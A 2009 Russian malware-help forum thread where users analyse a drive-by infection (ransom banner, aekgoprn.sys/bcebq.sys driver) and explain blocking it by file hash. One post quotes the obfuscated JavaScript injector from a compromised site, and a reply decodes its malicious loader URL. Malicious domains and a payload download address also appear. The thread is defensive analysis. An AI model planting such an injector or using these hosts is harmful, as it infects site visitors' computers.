Показано с 1 по 13 из 13.

ПО File Downloader доступ в сеть запрещен

  1. #1
    Junior Member Репутация
    Регистрация
    14.12.2009
    Сообщений
    4
    Вес репутации
    30

    ПО File Downloader доступ в сеть запрещен

    Здравствуйте !!!
    На скрине видно, сегодня при попытке скачать торрент-файлик вот такая бяка встала на рабочем столе, и кстати блокировалла соединение с интернет, а именно DSL-Router DSL 2520U с компьтером.
    Мне помогло восстановление системы Виндовс ХП Хоме-эдишн лицензия, откатился на 13 декабря и баннер исчез.
    Что мне надо сделать чтоб окончательно удалить всякую бяку после этого баннера? Антивирусов в системе нет, был Касперский лицензия но в начале декабря лицензия кончилась, а продлевать нет смысла от этого каспера.
    На данный момент комп не тормозит, программы нормально запускаются, пишу с этого-же компа.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1293
    Вам поговорить или решить проблему?

  4. #3
    Junior Member Репутация
    Регистрация
    14.12.2009
    Сообщений
    4
    Вес репутации
    30
    Да вобщем проблема решена, но есть другая на почту не пришло письмо активации аккаунта, через "обратную связь" написал а в ответ тишина, личные данные нельзя редактировать.

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1293
    Тогда переедем. Пока сюда, дальше администрация решит, куда лучше.

  6. #5
    Junior Member Репутация
    Регистрация
    14.12.2009
    Сообщений
    4
    Вес репутации
    30
    Ну вот и письмо дошло; Отправлено 14 декабря 2009 в 16:15, получено в 21:25

  7. #6
    Junior Member Репутация
    Регистрация
    04.04.2008
    Сообщений
    5
    Вес репутации
    37

    Меры по защите от aekgoprn.sys

    За последнюю неделю зарегистрировал 6 фактов заражения зловредом aekgoprn.sys в своей организации. Поскольку лечить эту дрянь надоело, решил разобраться откуда она берется и заблокировать эти источники.
    Последний инцидент был вчера по словам пользователя вирус запустился после похода на сайт.
    Сегодня покурил логи squid и нашел откуда прицепилась зараза.
    Итак первое что стоит посмотреть это xandora.security.net.my/?p=1406[/URL] (небольшое описание которое дает хоть какую-нибудь информацию)

    В логах нашел следующие источники этой заразы:
    forhomessale.ru/new/controller.php? - DIRECT/91.215.156.74 text/html
    foresaleonline.ru/ololo.php - DIRECT/81.89.102.178 text/html

    Сам сайт forhomessale.ru/ пуст, там просто стоит какой-то WEB-сервер для (вполне возможно для распространения заразы).

    Еще зарегистриовал запрос по адресу kindpea.ru/good/receiver/online, этот узел на момент написания поста не доступен, при попытке доступа говорит Connection Refused. Что это за узел сказать трудно но в "небольшом описании" он присутствует в разделе "Malware Traffic – DNS", т.е. похоже зловред после установке шлет туда DNS запросы (или для атаки или для своей работы).

    controller.php имеет размер 325 640 байт, что из себя представлет не знаю, на приложение windows не похоже.
    Последний раз редактировалось Shu_b; 18.12.2009 в 11:06.

  8. #7
    Junior Member Репутация
    Регистрация
    04.04.2008
    Сообщений
    5
    Вес репутации
    37
    Ну полный фишиш. Еще почитал логи и нашел очень интересный сайт.

    ВНИМАНИЕ!!! Не заходите на нижеуказанный сайт ни при каких обстоятельствах с использованием IE и Firefox, это может принести вред вашему компьютеру.
    =================
    h_t_t_p://ridjey.ru
    =================

    Если зайти на этот сайт будет установлен вирус без каких-либо предупреждений, уведомлений и предложений, он просто будет установлен и нарушит нормальную работу Win.

    Посмотрев контент нашел вот что:

    Код:
    *GNU GPL*/ 
    try{window.onload = function()
    	{
    	var D6rxya3l44pnunx = document.createElement('script');
    	D6rxya3l44pnunx.setAttribute('type', 'text/javascript');
    	D6rxya3l44pnunx.setAttribute('id', 'myscript1');
    	D6rxya3l44pnunx.setAttribute('src',  '
            ========Указаный ниже блок кода пишется в одну строку=====
    	h#$t(&$!t(!p(:&)/#&/(g#(@o$#@o#g(l^&^$$e!(-&c#!(o!m@-$&^d^@!o!((@).
    	(^i!#()n)!s##!i@!(^g#h&)@&t#e&#x#&)^p#)r&!$e&^!s###&s$!a!))i@(#).
    	!#c@$o$@!m(.($$d&^)t#)$)(i@$(b@!^#l&&$o&!g!@-&(^#c#(&o##&m$!)#.
    	#g#!^r#!e)$^#a^@#)t)$(^s)()a)l^$e)c^!&e#!^n$)t(#e^r$$&).)(!$$r^@u):
    	(&^8@)0$@)8$0$)/!##g&!(s@#m#a@r$(e)^n!@a@.#)c@o)^m##^/&#@g^$s@)#$m^#a$&r&!&e(&$n(&^a!)#^.
    	&c)o@#&m(/#$#$m@($!&e$!#t&^!r)!^@o)$l##y&#(r!^^i@#@!c(s$)^$).$!(c(o^^&#m)!^$/)!&q)
    	@$i!&&d&^(#)i^a^&@n#.!^@c($$o#@@m$!/(^g^o!&^(o!&(^@g()l^#&e((!!.@!c&$)o))
    	(#^m#/$'.replace(/\$|\^|\)|&|\(|\!|#|@/ig, ''));
    	======================================================
    	D6rxya3l44pnunx.setAttribute('defer', 'defer');
    	document.body.appendChild(D6rxya3l44pnunx);
    	}
    	} 
    catch(e) {}
    Видимо вот это JavaScript-животное и цепляет заразу без спроса (хотя за достоверность не ручаюсь, дебаг не делал).

    Как возможный вариант источника заразы - подхват контента с баннерных систем. Например в HTML-коде указанного выше сайта я нашел подгрузку файлика "autocontext2.js" с autocontext.begun.ru. Этот скрипт генерирует контекстную рекламу на сайте и теоретически если запулить на бегун баннер хитрого содержания можно заставить браузер выполнить произвольный код. Если такое возможно, то под угрозой очень большое количество пользователей.

    Добавлено через 27 минут

    Кажется нашел основной файл вируса. Называется он applicationdata.bin и расположен по адресу 208.101.27.44/applicationdata.bin. Имеет размер 698041 байт и представляет из себя драйвер KernelMode который в систему устаналивается как сервис под именем bcebq и хранится этот драйвер по адресу c:\windows\system32\bcebq.sys Этот драйвер невозможно выгрузить или удалить. Для удаления мне пришлось загрузить консоль восстановления и удалить файлик из коммандной строки. Сложность удаления из под работающей винды в том, что при вызове контекстного меню "свойства" для этого файла не удается увидеть вкладку разрешения (хотел просто запретить для системы чтение этого файла), тоже самое касается ключа реестра для этого драйвера, контекстное меню разрешений открывает пустое окно с надписью "Ошибка доступа к информации о безопасности".
    Этот драйвер похоже сильно хозяйничает в ядре операционной системе если может сделать такое.
    Последний раз редактировалось fksm; 18.12.2009 в 13:41. Причина: Добавлено

  9. #8
    Junior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    12.05.2009
    Сообщений
    43
    Вес репутации
    74
    to fksm:
    А если изменить натройки безопасности IE со стандартных на нормальные, то автоматическая установка этого "ПО" возможна?

  10. #9
    Junior Member Репутация
    Регистрация
    04.04.2008
    Сообщений
    5
    Вес репутации
    37
    Если честно не пробовал, но наверное возможно. Я сейчас посмотрел настройки по-умолчанию и для JavaScript там все разрешено без спросу, но есть варианты "запретить" и "предложить". Думаю если поставить хотя бы вариант "Предложить" так просто гадость не прицепится. Но с другой стороны не известно как будут на такой уровень безопасности реагировать другие обычные сайты. Например тот-же гугл со своим Ajax-ом в строке поиска может либо не запуститься, либо замучает вопросами "можно/нельзя". Надо попробовать.

  11. #10
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    15.06.2008
    Сообщений
    482
    Вес репутации
    112
    Вообще-то, обычно подобные вещи (Windows Заблокирован, Digital Access, Ufast и т.п.) бывают на видеосайтах, обычно такие сайты не имеют URL (только IP).

  12. #11
    Junior Member Репутация
    Регистрация
    14.12.2009
    Сообщений
    4
    Вес репутации
    30
    Цитата Сообщение от fksm Посмотреть сообщение
    Видимо вот это JavaScript-животное и цепляет заразу без спроса
    Точно вспомнил, перед тем как загрузить торрент-файлик этот JavaScript устанавливался у меня на IE-8 без какого либо запроса.

  13. #12
    Junior Member Репутация
    Регистрация
    04.04.2008
    Сообщений
    5
    Вес репутации
    37
    А вот и подтверждение: http://virusinfo.info/showthread.php?t=64189

    Поиск в гугле по слову Hva23p3hnyirlpv7 (это слово взято из прицепленного вирусом кода) выдает 434 узла, и все они заражены. Довольно продвинутый способ распространения заразы, я такого еще не встречал.

    Итак что делать чтобы описанный вирус не запустился?

    1. Делаем пуск - выполнить, пишем mmc жмем ок
    2. В открывшейся консоли жмем "Консоль - добавить или удалить оснастку..."
    3. В диалоговом окне жмем кнопку "Добавить" и добавляем оснастку "Редактор групповой политики".
    4. Переходим по дереву Конфигурация компьютера - Конфигурация Windows - Параметры безопасности - Политики ограниченного использования программ.
    5. При первом входе в этот элемент нужно создать новые политики используя пункт меню "Действие".
    6. Далее заходим в "дополнительные правила" и нажав вправом окне правой кнопкой мыши "создать правила для хеша" вводим данные о блокируемом файле:
    а) поле хешируемый файл задается в значение af479a1a09db648b9445a0c8c0756c05:697856:32771
    б) поле информация файла здается в значение applicationdata.bin, 682 КБ
    в) безопасность - не разрешено

    Аналогичным образом блокируем второй файл:
    а) 1d6596b0b9011c24163b4136be189a27:15360:32771
    б) ~TM2FF.tmp, 16 КБ
    в) не разрешно

    Дальше можно закрыть mmc, на предложение сохранить консоль можно нажать нет, этот ответ не повлияет на сделанные операции, т.к. они применяются сразу же после ввода данных, а сохранение консоли всего лишь сохраняет набор созданных оснасток.
    Последний раз редактировалось fksm; 19.12.2009 в 21:06.

  14. #13
    Junior Member Репутация
    Регистрация
    11.01.2008
    Адрес
    Н-ск
    Сообщений
    3
    Вес репутации
    37
    Цитата Сообщение от fksm Посмотреть сообщение
    .replace(/\$|\^|\)|&|\(|\!|#|@/ig, '')
    если в указанном выше куске кода выполнить этот replace
    то получиться примерно следующее
    _http://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com
    вот туда он или чета качает или куда дальше отправляет.
    кстати НОД сразу ахтунг объявляет на этот адрес.

Похожие темы

  1. Ответов: 6
    Последнее сообщение: 20.12.2009, 13:28
  2. ПО File Downloader доступ в сеть запрещен
    От SerenPsy88 в разделе Помогите!
    Ответов: 13
    Последнее сообщение: 18.12.2009, 20:43
  3. Доступ в сеть заблокирован! ПО File Downloader
    От peres в разделе Помогите!
    Ответов: 7
    Последнее сообщение: 17.12.2009, 23:19
  4. ПО File Downloader. Доступ в сеть заблокирован! №1
    От E.Katalin в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 16.12.2009, 15:37
  5. ПО File Downloader доступ в сеть запрещен
    От Kostian в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 14.12.2009, 20:52

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00545 seconds with 16 queries